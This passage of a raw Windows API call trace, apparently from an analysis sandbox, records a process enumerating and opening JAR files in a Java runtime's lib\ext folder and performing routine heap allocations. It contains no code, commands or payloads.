Flags=0x0, Size=0x14) returned 0x34f90 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a400 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0096.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.506] AreFileApisANSI () returned 1 [0096.506] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar", lpUsedDefaultChar=0x0) returned 57 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0096.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0096.507] AreFileApisANSI () returned 1 [0096.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.507] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0096.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 57 [0096.507] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.508] GetFileType (hFile=0x418) returned 0x1 [0096.508] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0096.508] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.508] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.508] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.508] CloseHandle (hObject=0x418) returned 1 [0096.508] AreFileApisANSI () returned 1 [0096.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0096.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 57 [0096.509] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.509] GetFileType (hFile=0x418) returned 0x1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0096.509] CloseHandle (hObject=0x418) returned 1 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.510] AreFileApisANSI () returned 1 [0096.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0096.510] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar") returned 57 [0096.510] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunmscapi.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x7fbb)) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.510] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3d5bf, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sunpkcs11.jar", cAlternateFileName="SUNPKC~1.JAR")) returned 1 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ac50 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0096.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.511] AreFileApisANSI () returned 1 [0096.511] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar", lpUsedDefaultChar=0x0) returned 57 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.511] AreFileApisANSI () returned 1 [0096.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0096.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 57 [0096.512] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.512] GetFileType (hFile=0x418) returned 0x1 [0096.512] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0096.513] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.513] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.513] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.513] CloseHandle (hObject=0x418) returned 1 [0096.513] AreFileApisANSI () returned 1 [0096.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0096.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 57 [0096.513] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0096.513] GetFileType (hFile=0x418) returned 0x1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0096.514] CloseHandle (hObject=0x418) returned 1 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.515] AreFileApisANSI () returned 1 [0096.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a4b0 [0096.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a4b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar") returned 57 [0096.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\sunpkcs11.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x3d5bf)) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.515] FindNextFileW (in: hFindFile=0x78290, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x10d3c, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zipfs.jar", cAlternateFileName="")) returned 1 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.515] HeapFree (in: hHeap=0x20000, 